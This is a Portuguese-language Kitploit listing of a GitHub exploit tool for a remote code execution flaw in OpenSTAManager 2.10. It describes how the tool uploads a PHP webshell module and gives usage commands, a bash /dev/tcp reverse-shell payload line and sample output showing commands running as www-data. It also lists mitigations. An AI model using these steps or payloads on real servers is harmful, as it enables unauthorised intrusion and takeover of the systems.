Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
OpenSTAManager_RCE_Exploit-CVE-2026-38751- — Exploit RCE OpenSTAManager (CVE-2026-38751) | Kitploit
Ferramentas/GitHubGitHub/hackthem/openstamanager_rce_exploit-cve-2026-38751-
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso RemotoGeração de Shellcode
GitHubhackthem/openstamanager_rce_exploit-cve-2026-38751-

OpenSTAManager_RCE_Exploit-CVE-2026-38751-

Exploit RCE OpenSTAManager (CVE-2026-38751)

Ver Repositório
15há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit RCE do OpenSTAManager (CVE-2026-38751)

Visão Geral

Este script Python explora uma vulnerabilidade de Execução Remota de Código no OpenSTAManager versão 2.10, identificada como CVE-2026-38751. O exploit permite que usuários autenticados carreguem um módulo malicioso e executem comandos arbitrários no sistema alvo.

Detalhes da Vulnerabilidade

  • CVE ID: CVE-2026-38751
  • Produto: OpenSTAManager
  • Versão: 2.10
  • Tipo: Execução Remota de Código (RCE)
  • Vetor de Ataque: Baseado na web, requer autenticação válida

Como o Exploit Funciona

O exploit segue os seguintes passos:

  1. Autenticação: Faz login no aplicativo OpenSTAManager usando as credenciais fornecidas
  2. Habilitar Atualizações: Ativa a funcionalidade de atualização de módulos, necessária para o exploit
  3. Criar ZIP Malicioso: Gera um arquivo ZIP contendo:
    • Um arquivo de definição de módulo (MODULE)
    • Um script PHP shell (shell.php) que executa comandos via parâmetro GET
c
  • Carregar Módulo: Envia o ZIP malicioso através da interface de atualização de módulos
  • Verificar Exploração: Confirma que o shell está acessível e funcional
  • Executar Comandos: Ou:
    • Modo shell interativo para execução manual de comandos
    • Conexão reverse shell para estabelecer uma conexão persistente
  • Pré-requisitos

    • Python 3.x
    • Pacotes Python necessários: requests, zipfile
    • Credenciais de administrador válidas para o OpenSTAManager
    • Acesso de rede ao sistema alvo

    Uso

    Uso Básico

    root@kitploit:~
    python3 exploit.py -u http://target.com -U admin -P password
    

    Modo Shell Interativo

    root@kitploit:~
    python3 exploit.py -u http://target.com -U admin -P password --interactive
    

    Modo Reverse Shell

    root@kitploit:~
    python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444
    

    Argumentos

    ArgumentoDescrição
    -u, --urlURL alvo (obrigatório)
    -U, --userNome de usuário para autenticação (obrigatório)
    -P, --passwordSenha para autenticação (obrigatório)
    --interactiveEntrar no modo shell interativo
    --no-cleanupNão remover arquivos shell após a execução
    --lhostHost local para reverse shell
    --lportPorta local para reverse shell

    Detalhes Técnicos

    Processo de Exploração

    1. Autenticação: O script realiza uma requisição de login ao endpoint de autenticação do aplicativo
    2. Habilitação de Atualização de Módulos: Envia uma requisição POST para habilitar a funcionalidade de atualização de módulos
    3. Geração do ZIP: Cria um arquivo ZIP com:
      • shell/MODULE: Arquivo de configuração do módulo
      • shell/shell.php: Webshell PHP que executa comandos passados via parâmetro GET c
    4. Processo de Upload: Usa dados de formulário multipart para enviar o ZIP malicioso ao endpoint de atualização de módulos
    5. Verificação: Testa o shell enviado executando um comando simples como id para confirmar seu funcionamento
    6. Execução de Comandos: Fornece um shell interativo ou estabelece uma conexão reverse shell

    Payloads Utilizados

    O exploit tenta múltiplos payloads de reverse shell:

    • Shell reverso Bash: bash -i >& /dev/tcp/{lhost}/{lport} 0>&1
    • Shells reversos em Python usando conexões socket
    • Payload bash codificado em Base64
    • Shell reverso Netcat

    Considerações de Segurança

    ⚠️ Aviso: Este exploit é destinado apenas para fins educacionais e de testes de segurança autorizados.

    Avaliação de Riscos

    Esta vulnerabilidade permite:

    • Execução arbitrária de código como o usuário do servidor web
    • Potencial escalada de privilégios
    • Acesso a dados sensíveis armazenados no sistema
    • Possível movimento lateral dentro de uma rede

    Mitigação

    Para se proteger contra esta vulnerabilidade:

    1. Atualize o OpenSTAManager para a versão mais recente
    2. Implemente controles de autenticação adequados
    3. Restrinja as capacidades de upload de arquivos
    4. Monitore atividades suspeitas
    5. Aplique segmentação de rede

    Exemplo de Saída

    root@kitploit:~
    [ OpenSTAManager RCE Exploit : ]
    
    Target: http://target.com
    [*] Step 1: Login...
    [+] Login successful: admin
    [*] Step 2: Enable updates...
    [+] Updates enabled
    [*] Step 3: Create ZIP...
    [*] Created in-memory ZIP file
    [*] Shell location: /modules/shell/shell.php
    [*] Step 4: Upload...
    [*] Upload status: 200
    [+] Upload successful
    [*] Step 5: Verify...
    [+] Vulnerability confirmed!
    [+] Shell: http://target.com/modules/shell/shell.php
    [+] Test: http://target.com/modules/shell/shell.php?c=whoami
    
    [*] Entering interactive mode...
    cmd> whoami
    www-data
    cmd> exit
    

    Referências

    • Repositório GitHub
    • Detalhes do CVE

    Licença

    Este exploit é fornecido apenas para fins educacionais. O uso não autorizado contra sistemas que você não possui ou sem permissão explícita para testar é ilegal.

    Baixar ferramenta